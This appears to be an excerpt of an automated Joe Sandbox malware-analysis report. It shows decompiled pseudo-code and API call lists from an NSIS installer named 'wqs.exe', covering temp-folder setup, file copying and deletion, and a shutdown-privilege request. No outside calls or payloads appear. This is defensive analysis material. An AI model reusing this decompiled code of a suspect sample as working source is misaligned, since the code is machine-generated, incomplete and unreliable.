Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B57() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42b22c;
				_t3 = E00403B3C(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42b22c =  *0x42b22c & 0x00000000;
				return _t3;
			}

0x00403b58
0x00403b60
0x00403b67
0x00403b6a
0x00403b6a
0x00403b6c
0x00403b71
0x00403b78
0x00403b7e
0x00403b82
0x00403b83
0x00403b8b

APIs

FreeLibrary.KERNEL32(?,75B53420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
GlobalFree.KERNEL32(?), ref: 00403B78

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC

Uniqueness

Uniqueness Score: -1.00%

Function 00405F92 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wqs.exePID: 4356, Parent PID: 4760COMMON

Execution Graph

Execution Coverage:	23.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1360
Total number of Limit Nodes:	34

Executed Functions

Function 0040352D Relevance: 84.4, APIs: 33, Strings: 15, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				signed int _t217;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				char* _t233;
				signed int _t234;
				WCHAR* _t235;
				void* _t251;

				_t217 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x434fb8 = _v324.dwBuildNumber;
				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x434fbe != 0x600) {
					_t180 = E0040690A(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E0040689A(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E0040690A(0xb);
				 *0x434f04 = E0040690A(9);
				_t88 = E0040690A(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x434fbc =  *0x434fbc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x434fc0 = _t88;
				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
				E0040653D(0x433f00, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t233 = L"\"C:\\Users\\Arthur\\AppData\\Roaming\\wqs.exe\" ";
				E0040653D(_t233, _t92);
				_t94 = _t233;
				_t234 = 0x22;
				 *0x434f00 = 0x400000;
				_t251 = L"\"C:\\Users\\Arthur\\AppData\\Roaming\\wqs.exe\" " - _t234; // 0x22
				if(_t251 == 0) {
					_t217 = _t234;
					_t94 =  &M00440002;
				}
				_t199 = CharNextW(E00405E39(_t94, _t217));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405E39(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t199);
										L37:
										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E004034FC(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403B12();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x434f94 == _t189) {
														L77:
														_t120 =  *0x434fac;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E0040690A(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B9D(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x434f1c == _t189) {
												L51:
												 *0x434fac =  *0x434fac | 0xffffffff;
												_v24 = E00403BEC(_t265);
												goto L68;
											}
											_t219 = E00405E39(L"\"C:\\Users\\Arthur\\AppData\\Roaming\\wqs.exe\" ", _t189);
											if(_t219 < L"\"C:\\Users\\Arthur\\AppData\\Roaming\\wqs.exe\" ") {
												L48:
												_t264 = _t219 - L"\"C:\\Users\\Arthur\\AppData\\Roaming\\wqs.exe\" ";
												_v8 = L"Error launching installer";
												if(_t219 < L"\"C:\\Users\\Arthur\\AppData\\Roaming\\wqs.exe\" ") {
													_t190 = E00405B08(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t138 = lstrcmpiW(_t235, 0x441800);
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405AEB();
														} else {
															E00405A6E();
														}
														SetCurrentDirectoryW(_t235);
														__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", 0x441800);
														}
														E0040653D(0x436000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x436800 = _t144;
														do {
															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
															DeleteFileW(0x42aa28);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\Arthur\\AppData\\Roaming\\wqs.exe", 0x42aa28, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E004062FD(_t202, 0x42aa28, 0);
																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
																	_t153 = E00405B20(0x42aa28);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x436800 =  *0x436800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062FD(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E00405F14(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
												E0040653D(0x441000, _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= L"\"C:\\Users\\Arthur\\AppData\\Roaming\\wqs.exe\" ") {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E004034FC(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E004034FC(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x434fa0 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403550
GetVersionExW.KERNEL32(?), ref: 00403579
GetVersionExW.KERNEL32(0000011C), ref: 00403590
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
OleInitialize.OLE32(00000000), ref: 0040366A
SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
CharNextW.USER32(00000000,"C:\Users\user\AppData\Roaming\wqs.exe" ,00000020,"C:\Users\user\AppData\Roaming\wqs.exe" ,00000000), ref: 004036D6
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
DeleteFileW.KERNELBASE(1033), ref: 0040386F
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965

Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\wqs.exe" ,00000000,?), ref: 0040397C
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\wqs.exe,0042AA28,00000001), ref: 00403A0E
CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
OleUninitialize.OLE32(?), ref: 00403A5E
ExitProcess.KERNEL32 ref: 00403A78
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
ExitProcess.KERNEL32 ref: 00403B0C

Strings

"C:\Users\user\AppData\Roaming\wqs.exe" , xrefs: 004036A3, 004036A9, 004036BE, 00403895, 004038A1, 004038EF, 004038F9
.tmp, xrefs: 0040396A
Low, xrefs: 0040383C
1033, xrefs: 0040386A
SeShutdownPrivilege, xrefs: 00403AA1
Error launching installer, xrefs: 004038FF
~nsu, xrefs: 0040394E
TEMP, xrefs: 0040384E
C:\Users\user\AppData\Roaming\wqs.exe, xrefs: 00403A09
\Temp, xrefs: 00403820
TMP, xrefs: 00403856
C:\Users\user\AppData\Local\Temp\, xrefs: 004037FE, 00403803, 00403819, 00403825, 00403834, 00403841, 0040384D, 00403855, 00403953, 00403964, 0040396F, 0040397B, 0040398C, 0040399B, 00403A51
C:\Users\user\AppData\Local\Temp, xrefs: 004037EE, 0040391D, 004039A4, 004039AE
NSIS Error, xrefs: 0040368E
UXTHEME, xrefs: 0040361B, 00403620, 00403626

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\AppData\Roaming\wqs.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\wqs.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-3905141715
Opcode ID: 8d24a3590c3fa0910ef95ef3363b7165c5538ed9a562f2e07edb708d24b89e61
Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
Opcode Fuzzy Hash: 8d24a3590c3fa0910ef95ef3363b7165c5538ed9a562f2e07edb708d24b89e61
Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C49 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405F14(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x434f88 =  *0x434f88 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040653D(0x42f270, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E58(_t68);
					} else {
						lstrcatW(0x42f270, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x42f270,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040653D(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405C01(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E0040559F(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x434f88 =  *0x434f88 + 1;
										} else {
											E0040559F(0xfffffff1, _t68);
											E004062FD(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C49(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x42f270 - 0x5c;
					if( *0x42f270 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406873(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405E0C(_t68);
							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E0040559F(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E0040559F(0xfffffff1, _t68);
							return E004062FD(_t67, _t68, 0);
						}
						L30:
						 *0x434f88 =  *0x434f88 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

APIs

DeleteFileW.KERNELBASE(?,?,75B53420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
